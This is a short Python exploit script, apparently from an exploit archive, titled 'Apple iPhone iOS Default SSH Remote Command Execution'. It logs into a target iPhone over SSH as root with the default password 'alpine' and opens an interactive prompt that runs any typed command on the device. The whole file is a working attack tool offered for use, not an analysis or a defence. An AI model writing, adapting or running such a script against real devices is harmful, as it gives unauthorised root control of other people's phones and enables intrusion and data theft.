#!/usr/bin/python
# This software opens a simple shell where you can type commands to send and works without Metasploit
# Exploit Title: Apple iPhone iOS Default SSH Remote Command Execution exploit
# Exploit Author: D35m0nd142
# Date: 17/02/2013
# Vendor Homepage: http://www.apple.com
# Screenshot: http://imageshack.us/photo/my-images/713/iphoneexploit.png/
# Tested on: Ubuntu 12.04 - Backtrack 5 R3 - Windows 7 Home Premium - Backbox
import paramiko
import sys,time
import os
os.system("clear")
iphoneip = sys.argv[1]
print "=================================================================="
print "= Apple iPhone iOS SSH Remote Command Execution exploit ="
print "= Created by D35m0nd142 ="
print "==================================================================\n"
#def usage():
# if len(sys.argv) != 2:
# print "Usage: python exploit.py <iphone_ip> \n"
# sys.exit(1)
def exploit(iphoneip,cmd):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(iphoneip,username='root',password='alpine')
stdin, stdout, stderr = ssh.exec_command(cmd)
resp = stdout.readlines()
print resp
ssh.close()
#usage()
time.sleep(1.3)
cmd = " "
while (cmd != "quit"):
try:
cmd = raw_input("shell:~# ")
exploit(iphoneip,cmd)
except KeyboardInterrupt:
print "\nExiting . . \n"
sys.exit(1)
